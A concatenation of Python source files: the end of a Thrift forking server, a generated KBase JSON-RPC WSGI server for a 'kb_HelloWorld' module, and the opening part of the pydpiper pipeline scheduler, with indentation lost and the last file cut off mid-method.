iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, e:
logging.exception(e)
ecode = 1
finally:
try_close(itrans)
try_close(otrans)
os._exit(ecode)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
def collect_children(self):
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except os.error:
pid = None
if pid:
self.children.remove(pid)
else:
break
|
kb_HelloWorldServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_HelloWorld.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_HelloWorld'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_HelloWorld.kb_HelloWorldImpl import kb_HelloWorld # noqa @IgnorePep8
impl_kb_HelloWorld = kb_HelloWorld(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a Python
object instead of a JSON string. It is mainly useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_HelloWorld'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_HelloWorld.printhelloworld,
name='kb_HelloWorld.printhelloworld',
types=[dict])
self.method_authentication['kb_HelloWorld.printhelloworld'] = 'required' # noqa
self.rpc_service.add(impl_kb_HelloWorld.status,
name='kb_HelloWorld.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_HelloWorld ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP-based server listening on
# port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system-assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
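# Editor's note -- illustrative usage, not part of the generated server code:
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... issue JSON-RPC POST requests against http://localhost:<port>/ ...
#     stop_server()
#
# With newprocess=False (the default), start_server() blocks in serve_forever().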
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
pipeline.py
|
#!/usr/bin/env python3
import hashlib
import threading
import networkx as nx # type: ignore
import os
import sys
import signal
import socket
import time
import re
import resource
from collections import defaultdict
from datetime import datetime
import subprocess
from shlex import split
from multiprocessing import Process, Event # type: ignore
from configargparse import Namespace
import logging
import functools
import math
from typing import Any
try:
from sys import intern
except ImportError:
    pass  # older Pythons expose `intern` as a builtin rather than in `sys`
# TODO move this and Pyro4 imports down into launchServer where pipeline name is available?
#os.environ["PYRO_LOGLEVEL"] = os.getenv("PYRO_LOGLEVEL", "INFO")
#os.environ["PYRO_LOGFILE"] = os.path.splitext(os.path.basename(__file__))[0] + ".log"
# TODO name the server logfile more descriptively
logger = logging # type: Any
#logger = logging.getLogger(__name__)
logger.basicConfig(filename="pipeline.log", level=os.getenv("PYDPIPER_LOGLEVEL", "INFO"),
datefmt="%Y-%m-%d %H:%M:%S",
format="[%(asctime)s.%(msecs)03d,"
+__name__+",%(levelname)s] %(message)s") # type: ignore
import Pyro4 # type: ignore
from . import pipeline_executor as pe
from pydpiper.execution.queueing import create_uri_filename_from_options
Pyro4.config.SERVERTYPE = pe.Pyro4.config.SERVERTYPE
LOOP_INTERVAL = 5
STAGE_RETRY_INTERVAL = 1
sys.excepthook = Pyro4.util.excepthook # type: ignore
class PipelineFile(object):
def __init__(self, filename):
self.filename = filename
self.setType()
def setType(self):
self.fileType = None
def __repr__(self):
return(self.filename)
class InputFile(PipelineFile):
def setType(self):
self.fileType = "input"
class OutputFile(PipelineFile):
def setType(self):
self.fileType = "output"
class LogFile(PipelineFile):
def setType(self):
self.fileType = "log"
"""
The executor client class:
client: URI string identifying the executor
maxmemory: the total amount of memory the executor has at its disposal
The server uses these records to keep track of the stages each executor is
running and whether it is still alive (based on a periodic heartbeat).
"""
class ExecClient(object):
def __init__(self, client, maxmemory):
self.clientURI = client
self.maxmemory = maxmemory
self.running_stages = set([])
self.timestamp = time.time()
def memoize_hook(hook): # TODO replace with functools.lru_cache (?!) in python3
data = Namespace(called=False, result=None) # because of Python's bizarre assignment rules
def g():
if data.called:
return data.result
else:
data.result = hook()
data.called = True
return data.result
return g
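# Editor's note -- illustrative sketch of memoize_hook: the wrapped hook's side
# effect runs at most once even if the stage becomes runnable repeatedly.
#
#     calls = []
#     h = memoize_hook(lambda: calls.append("ran") or len(calls))
#     h(); h()                 # underlying hook executes only on the first call
#     assert calls == ["ran"]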
class PipelineStage(object):
def __init__(self):
self.mem = None # if not set, use pipeline default
self.procs = 1 # default number of processors per stage
# the input files for this stage
self.inputFiles = [] # type: List[str]
# the output files for this stage
self.outputFiles = [] # type: List[str]
self.logFile = None
self.status = None
self.name = ""
self.colour = "black" # used when a graph is created of all stages to colour the nodes
self.number_retries = 0
# functions to be called when the stage becomes runnable
# (these might be called multiple times, so should be benign
# in some sense)
self._runnable_hooks = []
# functions to be called when a stage finishes
self.finished_hooks = []
def add_runnable_hook(self, h, memoize=True):
self._runnable_hooks.append((memoize_hook if memoize else lambda x: x)(h))
def isFinished(self):
return self.status == "finished"
def setRunning(self):
self.status = "running"
def setFinished(self):
self.status = "finished"
def setFailed(self):
self.status = "failed"
def setNone(self):
self.status = None
def setMem(self, mem):
self.mem = mem
def getMem(self):
return self.mem
def setProcs(self, num):
self.procs = num
def getProcs(self):
return self.procs
def getHash(self):
return(hash("".join(self.outputFiles) + "".join(self.inputFiles)))
def __eq__(self, other):
return self.inputFiles == other.inputFiles and self.outputFiles == other.outputFiles
def __ne__(self, other):
return not(self.__eq__(other))
def getNumberOfRetries(self):
return self.number_retries
def incrementNumberOfRetries(self):
self.number_retries += 1
class CmdStage(PipelineStage):
pipeline_start_time = datetime.isoformat(datetime.now())
logfile_id = 0
def __init__(self, argArray):
PipelineStage.__init__(self)
self.cmd = [] # the input array converted to strings
self.parseArgs(argArray)
#self.checkLogFile()
def parseArgs(self, argArray):
if argArray:
for a in argArray:
ft = getattr(a, "fileType", None)
s = intern(str(a))
if ft == "input":
self.inputFiles.append(s)
elif ft == "output":
self.outputFiles.append(s)
self.cmd.append(s)
self.name = self.cmd[0]
def checkLogFile(self): # TODO silly, this is always called since called by __init__
if not self.logFile:
self.logFile = self.name + "." + CmdStage.pipeline_start_time + '-' + str(CmdStage.logfile_id) + ".log"
CmdStage.logfile_id += 1
def setLogFile(self, logFileName):
self.logFile = str(logFileName)
def execStage(self):
of = open(self.logFile, 'a')
of.write("Running on: " + socket.gethostname() + " at " + datetime.isoformat(datetime.now(), " ") + "\n")
of.write(repr(self) + "\n")
of.flush()
args = split(repr(self))
returncode = subprocess.call(args, stdout=of, stderr=of, shell=False)
of.close()
return(returncode)
def getHash(self):
"""Return a small value which can be used to compare objects.
Use a deterministic hash to allow persistence across restarts (calls to `hash` and `__hash__`
depend on the value of PYTHONHASHSEED as of Python 3.3)"""
return hashlib.md5("".join(self.cmd).encode()).hexdigest()
def __repr__(self):
return(" ".join(self.cmd))
def __eq__(self, other):
return (self is other) or (self.__class__ == other.__class__ and self.cmd == other.cmd)
def __hash__(self):
return tuple(self.cmd).__hash__()
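# Editor's note -- illustrative sketch, not part of the original module. A
# CmdStage is built from an argument array in which InputFile/OutputFile wrappers
# mark the dependencies; the filenames below are hypothetical:
#
#     stage = CmdStage(["cp", InputFile("a.txt"), OutputFile("b.txt")])
#     stage.setLogFile("cp_a_to_b.log")
#     # repr(stage) == "cp a.txt b.txt"; inputFiles/outputFiles drive createEdges()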
"""A graph with no edge information; see networkx/classes/digraph.py"""
class ThinGraph(nx.DiGraph):
all_edge_dict = {'weight': 1}
def single_edge_dict(self):
return self.all_edge_dict
edge_attr_dict_factory = single_edge_dict
class Pipeline(object):
# TODO the way we initialize a pipeline is currently a bit gross, e.g.,
# setting a bunch of instance variables after __init__ - the presence of a method
# called `initialize` should be a hint that all is perhaps not well, but perhaps
# there is indeed some information legitimately unavailable when we first construct the object
def __init__(self, stages, options):
# the core pipeline is stored in a directed graph. The graph is made
# up of integer indices
# main set of options, needed since (a) we don't bother unpacking
# every single option into `self`, (b) since (most of) the option set
# is needed to launch new executors at run time
self.pipeline_name = options.application.pipeline_name
self.options = options
self.exec_options = options.execution
self.G = ThinGraph()
# a map from indices to the number of unfulfilled prerequisites
# of the corresponding graph node (will be populated later -- __init__ is a misnomer)
self.unfinished_pred_counts = []
# an array of the actual stages (PipelineStage objects)
self.stages = []
self.nameArray = []
# indices of the stages ready to be run
self.runnable = set()
# an array to keep track of stage memory requirements
self.mem_req_for_runnable = []
# a hideous hack; the idea is that after constructing the underlying graph,
# a pipeline running executors locally will measure its own maxRSS (once)
# and subtract this from the amount of memory claimed available for use on the node.
self.memAvail = None
self.currently_running_stages = set()
# the current stage counter
self.counter = 0
# hash to keep the output to stage association
self.outputhash = {}
# a hash per stage - computed from inputs and outputs or whole command
self.stage_dict = {}
self.num_finished_stages = 0
self.failedStages = []
# location of backup files for restart if needed
self.backupFileLocation = self._backup_file_location()
# table of registered clients (using ExecClient class instances) indexed by URI
self.clients = {}
# number of clients (executors) that have been launched by the server
# we need to keep track of this because even though no (or few) clients
# are actually registered, a whole bunch of them could be waiting in the
# queue
self.number_launched_and_waiting_clients = 0
# clients we've lost contact with due to crash, etc.
self.failed_executors = 0
# time to shut down, due to walltime or having completed all stages?
# (use an event rather than a simple flag for shutdown notification
# so that we can shut down even if a process is currently sleeping)
self.shutdown_ev = None # was Event(), but this is too slow
self.programName = None
self.skipped_stages = 0
self.verbose = 0
# report back to the user which percentage of the pipeline stages has finished
# keep track of the last percentage that was printed
self.percent_finished_reported = 0
# Handle to write out processed stages to
self.finished_stages_fh = None
self.outputDir = self.options.application.output_directory or os.getcwd()
# TODO this doesn't work with the qbatch-based server submission on Graham:
if self.options.execution.submit_server and self.options.execution.local:
# redirect the standard output to a text file
serverLogFile = os.path.join(self.outputDir, self.pipeline_name + '_server_stdout.log')
LINE_BUFFERING = 1
sys.stdout = open(serverLogFile, 'a', LINE_BUFFERING)
for s in stages:
self._add_stage(s)
self.createEdges()
# could also set this on G itself ...
# TODO the name "unfinished" here is probably misleading since nothing is marked "finished";
# even though the "graph heads" are enqueued here, this will be changed later when completed stages
# are skipped :D
self.unfinished_pred_counts = [ len([i for i in self.G.predecessors(n)
if not self.stages[i].isFinished()])
for n in range(self.G.order()) ]
graph_heads = [n for n in self.G.nodes()
if self.unfinished_pred_counts[n] == 0]
logger.info("Graph heads: " + str(graph_heads))
for n in graph_heads:
self.enqueue(n)
# expose methods to get/set shutdown_ev via Pyro (setter not needed):
def set_shutdown_ev(self):
self.shutdown_ev.set()
def get_shutdown_ev(self):
return self.shutdown_ev
def getNumberFailedExecutors(self):
return self.failed_executors
def getNumberFailedStages(self):
return len(self.failedStages)
def getTotalNumberOfStages(self):
return len(self.stages)
def getNumberProcessedStages(self):
return self.num_finished_stages
def getNumberOfRunningClients(self):
return len(self.clients)
def getNumberOfQueuedClients(self):
return self.number_launched_and_waiting_clients
def setVerbosity(self, verbosity):
self.verbose = verbosity
def getCurrentlyRunningStages(self):
return self.currently_running_stages
def getNumberRunnableStages(self):
return len(self.runnable)
def getMemoryRequirementsRunnable(self):
return self.mem_req_for_runnable
def getMemoryAvailableInClients(self):
return [c.maxmemory for _, c in self.clients.items()]
def _add_stage(self, stage):
"""adds a stage to the pipeline"""
# check if stage already exists in pipeline - if so, don't bother
# check if stage exists - stage uniqueness defined by in- and output
# for base stages and entire command for CmdStages
# FIXME this logic is rather redundant and can be simplified
# (assuming that the set of stages the pipeline is given has
# the same equality relation as is used here)
# FIXME as getHash is called several times per stage, cache the hash in the stage.
# To save memory, we could make use of the fact that strings
# are actually interned, so it might be faster/cheaper
# just to store/compare the pointers.
h = stage.getHash()
if h in self.stage_dict:
self.skipped_stages += 1
#stage already exists - nothing to be done
else: #stage doesn't exist - add it
self.stage_dict[h] = self.counter
#self.statusArray[self.counter] = 'notstarted'
self.stages.append(stage)
self.nameArray.append(stage.name)
# add all outputs to the output dictionary
for o in stage.outputFiles:
self.outputhash[o] = self.counter
# add the stage's index to the graph
self.G.add_node(self.counter, label=stage.name, color=stage.colour)
self.counter += 1
# huge hack since default isn't available in CmdStage() constructor
# (may get overridden later by a hook, hence may really be wrong ... ugh):
if stage.mem is None and self.exec_options is not None:
stage.setMem(self.exec_options.default_job_mem)
def _backup_file_location(self, outputDir=None):
loc = os.path.join(outputDir or os.getcwd(),
self.pipeline_name + '_finished_stages')
return loc
def printStages(self, name):
print("Total number of stages in the pipeline: ", len(self.stages))
def printNumberProcessedStages(self):
print("Number of stages already processed: ", self.num_finished_stages)
def createEdges(self):
"""computes stage dependencies by examining their inputs/outputs"""
starttime = time.time()
# iterate over all nodes
for i in self.G.nodes():
for ip in self.stages[i].inputFiles:
# if the input to the current stage was the output of another
# stage, add a directional dependence to the DiGraph
if ip in self.outputhash:
self.G.add_edge(self.outputhash[ip], i)
endtime = time.time()
logger.info("Create Edges time: " + str(endtime-starttime))
def get_stage_info(self, i):
s = self.stages[i]
return pe.StageInfo(mem=s.mem, procs=s.procs, ix=i, cmd=s.cmd, log_file=s.logFile,
output_files=s.outputFiles, env_vars=s.env_vars)
def getStage(self, i):
"""given an index, return the actual pipelineStage object"""
return(self.stages[i])
# getStage<...> are currently used instead of getStage due to previous bug; could revert:
def getStageMem(self, i):
return(self.stages[i].mem)
def getStageProcs(self,i):
return(self.stages[i].procs)
def getStageCommand(self,i):
return(repr(self.stages[i]))
def getStageLogfile(self,i):
return(self.stages[i].logFile)
def is_time_to_drain(self):
return self.shutdown_ev.is_set()
# FIXME this isn't quite right ... once this is set, clients connecting
# normally over the next few seconds will crash (note they have no jobs,
# so this is sort of OK)
"""Given client information, issue commands to the client (along similar
lines to getRunnableStageIndex) and update server's internal view of client.
This is highly stateful, being a resource-tracking wrapper around
getRunnableStageIndex and hence a glorified Set.pop."""
def getCommand(self, clientURIstr, clientMemFree, clientProcsFree):
if self.is_time_to_drain():
return ("shutdown_abnormally", None)
# TODO now that getRunnableStageIndex pops from a set,
# intelligently look for something this client can run
# (e.g., by passing available resources
# into getRunnableStageIndex)?
if clientMemFree == 0:
logger.debug("Executor has no free memory")
return ("wait", None)
if clientProcsFree == 0:
logger.debug("Executor has no free processors")
return ("wait", None)
flag, i = self.getRunnableStageIndex()
if flag == "run_stage":
eps = 0.000001
memOK = self.getStageMem(i) <= clientMemFree + eps
procsOK = self.getStageProcs(i) <= clientProcsFree
if memOK and procsOK:
return (flag, i)
else:
if not memOK:
logger.debug("The executor does not have enough free memory (free: %.2fG, required: %.2fG) to run stage %d. (Executor: %s)", clientMemFree, self.getStageMem(i), i, clientURIstr)
if not procsOK:
logger.debug("The executor does not have enough free processors (free: %.1f, required: %.1f) to run stage %d. (Executor: %s)", clientProcsFree, self.getStageProcs(i), i, clientURIstr)
self.enqueue(i)
return ("wait", None)
else:
return (flag, i)
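    # Illustrative sketch (hypothetical executor-side code, not part of this class):
    # a client would typically poll getCommand with its free resources and dispatch
    # on the returned flag, e.g.
    #
    #     flag, i = pipeline_proxy.getCommand(my_uri, clientMemFree=8.0, clientProcsFree=4)
    #     if flag == "run_stage":
    #         run_stage_locally(pipeline_proxy.get_stage_info(i))
    #     elif flag == "wait":
    #         time.sleep(poll_interval)
    #     else:  # "shutdown_normally" or "shutdown_abnormally"
    #         shut_down_executor()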
"""Return a tuple of a command ("shutdown_normally" if all stages are finished,
"wait" if no stages are currently runnable, or "run_stage" if a stage is
available) and the next runnable stage if the flag is "run_stage", otherwise
None"""
def getRunnableStageIndex(self):
if self.allStagesCompleted():
return ("shutdown_normally", None)
elif len(self.runnable) == 0:
return ("wait", None)
else:
index = self.runnable.pop()
# remove an instance of currently required memory
try:
self.mem_req_for_runnable.remove(self.stages[index].mem)
except:
logger.debug("mem_req_for_runnable: %s; mem: %s", self.mem_req_for_runnable, self.stages[index].mem)
logger.exception("It wasn't here!")
return ("run_stage", index)
def allStagesCompleted(self):
return self.num_finished_stages == len(self.stages)
def addRunningStageToClient(self, clientURI, index):
try:
self.clients[clientURI].running_stages.add(index)
except:
print("\nError: could not find client %s while trying to add running stage" % clientURI)
raise
def removeRunningStageFromClient(self, clientURI, index):
try:
c = self.clients[clientURI]
except:
print("\nError: could not find client %s while trying to remove running stage" % clientURI)
raise
else:
try:
c.running_stages.remove(index)
except:
print("\nError: unable to remove stage index from registered client: %s" % clientURI)
logger.exception("Could not remove stage index from running stages list")
raise
#@Pyro4.oneway
def setStageStarted(self, index, clientURI):
URIstring = "(" + str(clientURI) + ")"
logger.info("Starting Stage " + str(index) + ": " + str(self.stages[index]) + URIstring)
# There may be a bug in which a stage is added to the runnable set multiple times.
# It would be better to catch that earlier (by using a different/additional data structure)
# but for now look for the case when a stage is run twice at the same time, which may
# produce bizarre results as both processes write files
